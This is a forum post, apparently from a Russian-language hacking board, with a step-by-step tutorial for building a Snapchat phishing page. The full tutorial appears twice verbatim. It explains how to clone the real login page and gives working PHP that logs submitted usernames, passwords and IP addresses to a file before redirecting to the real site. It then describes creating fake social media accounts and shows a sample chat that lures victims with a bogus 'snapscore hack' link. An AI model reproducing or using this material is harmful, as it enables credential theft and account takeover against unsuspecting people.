- Автор темы
- #1
HOW TO MAKE A PHISING WEBSITE TUT BY RAFAY BALOCH @DeRafay
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
In this thread I will show you how to:
Get a free domain.
Setup and steal a website source.
How to setup the website for phising.
How to semi-social engineer.
So what you need:
1 : Notepad of some short - Notepad++ for the simplest.
2 : Knowledge of *Social Engineering*
3 : A domain | I recommend using https://dot.tk for a free domain.
4 : Webhosting >> Make sure to not use [free] webhostng, it'll get banned in less then 10 minutes.
Okay so you have that?, ready to start!
1 : Okay so first you need to go to the website your wanting to copy in my case it's gonna be snapchat aka
*https://accounts.sna...ccounts/login*.
2 : Now that your on the page you want, your gonna go ahead and press [F12] on your keyboard, or right-click and
press *Inspect elements*
3 : Now that you have *Inspect elements* opened, you want to scroll all the way to the top where the <html> tag starts
and right click it and press *Edit as html* heres a screenshot/gif | https://gyazo.com/3f...c8c1a901eb06ded
4 : Now press ctrl-a then press ctrl-c to copy it all, then create a file on your desktop and name it whatever.
5 : Now after you have created the file, you want to go ahead and make another file called *index.html*.
6 : After you create *index.html* right click it and press open with *notepad++* or whatever your using,
and press *ctrl-v* to paste the copied code and press *ctrl-s* to save it.
7 : After that go ahead and press *ctrl-f* and it should pop a search box up,
theres a couple different ways you can find the <form> box, you can use the search box to help find it, but it will look something
like this | https://gyazo.com/b7...4d5e7dcc326928d
8 : After you find that you need to find where it says *action="something.php"* < it wont say *something, it'll be like login.php, or something*
random, but you need to change it to action="post.php"
9 : After you have change it to *post.php*, you need to go back into that file where you created *index.html* and make another file called *post.php*.
10 : After that you will need to put the following code into it **post.php**
Code:
<?php function grabip(){ if(!empty($_SERVER['HTTP_CLIENT_IP'])){ $ip= $_SERVER['HTTP_CLIENT_IP']; }elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip= $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip= $_SERVER['REMOTE_ADDR']; } return $ip; } header('Location:https://accounts.snapchat.com/accounts/'); $handle= fopen("log.txt", "a"); fwrite($handle, "IPAddress : ".grabip()."\n"); foreach($_POSTas $variable=> $value) { fwrite($handle, $variable); fwrite($handle, " : "); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n========================================="); fclose($handle); exit; ?>
11 : Now since i'm doing snapchat, the header will change to *https://accounts.sna...t.com/accounts/*, if you doing another website just change the header part to the website login your phishing for, so it will redirect them to the actual website.
13: Okay now that you have that all set up you need to go back into the file where everything is and create a file named
*log.txt* << This is where the usernames/emails : passwords + ip is gonna be stored!.
----------the files should look like this https://gyazo.com/bc1qug96ytxcw9cgutlug9...mna62k8nd5
14: After all that go ahead and upload it to the web-server! and your all set!.
15 : So this is everything for the page itself, you need to test the website to make sure it all worked.
=18Okay so it works great, now we need to get peoples passwords >
1 : Create a fake facebook account or snapchat account or instagram account, or just create all 3 of them.
- if you created a snapchat account, you will need to go to quick-add and add tons of people.
- if you created a facebook account, you will need to friend tons of people.
- if you created a instagram, you will need to following a bunch of people.
2 : *Social Engineering* - so getting people to go to your phishing website should be decently simple,
after all you probably don't have many friends that's as smart as you at this point
3 : You will need to talk them into something for example
[ SNAPCHAT | 10:10 _-` `===`]
|_________________________________>>>|
| |
|> Hello? |
| Yo I found a really cool snapscore hack<|
|> Really? |
| Yeah wanna see?<|
|> Sure why not |
| ight bet https://link.tk <|
|> Bet |
| Just login snapchat, I give you the link<|
| And go to where it says snapscore edit <|
|> Okay i'm doing it |
============================
Join The Platform To Be Opened To ManyMore Teachings
@DeRafay RAFAY BALOCH
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
In this thread I will show you how to:
Get a free domain.
Setup and steal a website source.
How to setup the website for phising.
How to semi-social engineer.
So what you need:
1 : Notepad of some short - Notepad++ for the simplest.
2 : Knowledge of *Social Engineering*
3 : A domain | I recommend using https://dot.tk for a free domain.
4 : Webhosting >> Make sure to not use [free] webhostng, it'll get banned in less then 10 minutes.
Okay so you have that?, ready to start!
1 : Okay so first you need to go to the website your wanting to copy in my case it's gonna be snapchat aka
*https://accounts.sna...ccounts/login*.
2 : Now that your on the page you want, your gonna go ahead and press [F12] on your keyboard, or right-click and
press *Inspect elements*
3 : Now that you have *Inspect elements* opened, you want to scroll all the way to the top where the <html> tag starts
and right click it and press *Edit as html* heres a screenshot/gif | https://gyazo.com/3f...c8c1a901eb06ded
4 : Now press ctrl-a then press ctrl-c to copy it all, then create a file on your desktop and name it whatever.
5 : Now after you have created the file, you want to go ahead and make another file called *index.html*.
6 : After you create *index.html* right click it and press open with *notepad++* or whatever your using,
and press *ctrl-v* to paste the copied code and press *ctrl-s* to save it.
7 : After that go ahead and press *ctrl-f* and it should pop a search box up,
theres a couple different ways you can find the <form> box, you can use the search box to help find it, but it will look something
like this | https://gyazo.com/b7...4d5e7dcc326928d
8 : After you find that you need to find where it says *action="something.php"* < it wont say *something, it'll be like login.php, or something*
random, but you need to change it to action="post.php"
9 : After you have change it to *post.php*, you need to go back into that file where you created *index.html* and make another file called *post.php*.
10 : After that you will need to put the following code into it **post.php**
Code:
<?php function grabip(){ if(!empty($_SERVER['HTTP_CLIENT_IP'])){ $ip= $_SERVER['HTTP_CLIENT_IP']; }elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip= $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip= $_SERVER['REMOTE_ADDR']; } return $ip; } header('Location:https://accounts.snapchat.com/accounts/'); $handle= fopen("log.txt", "a"); fwrite($handle, "IPAddress : ".grabip()."\n"); foreach($_POSTas $variable=> $value) { fwrite($handle, $variable); fwrite($handle, " : "); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n========================================="); fclose($handle); exit; ?>
11 : Now since i'm doing snapchat, the header will change to *https://accounts.sna...t.com/accounts/*, if you doing another website just change the header part to the website login your phishing for, so it will redirect them to the actual website.
13: Okay now that you have that all set up you need to go back into the file where everything is and create a file named
*log.txt* << This is where the usernames/emails : passwords + ip is gonna be stored!.
----------the files should look like this https://gyazo.com/bc1qug96ytxcw9cgutlug9...mna62k8nd5
14: After all that go ahead and upload it to the web-server! and your all set!.
15 : So this is everything for the page itself, you need to test the website to make sure it all worked.
=18Okay so it works great, now we need to get peoples passwords >
1 : Create a fake facebook account or snapchat account or instagram account, or just create all 3 of them.
- if you created a snapchat account, you will need to go to quick-add and add tons of people.
- if you created a facebook account, you will need to friend tons of people.
- if you created a instagram, you will need to following a bunch of people.
2 : *Social Engineering* - so getting people to go to your phishing website should be decently simple,
after all you probably don't have many friends that's as smart as you at this point
3 : You will need to talk them into something for example
[ SNAPCHAT | 10:10 _-` `===`]
|_________________________________>>>|
| |
|> Hello? |
| Yo I found a really cool snapscore hack<|
|> Really? |
| Yeah wanna see?<|
|> Sure why not |
| ight bet https://link.tk <|
|> Bet |
| Just login snapchat, I give you the link<|
| And go to where it says snapscore edit <|
|> Okay i'm doing it |
============================
Join The Platform To Be Opened To ManyMore Teachings
@DeRafay RAFAY BALOCH
- Telegram
- @DeRafay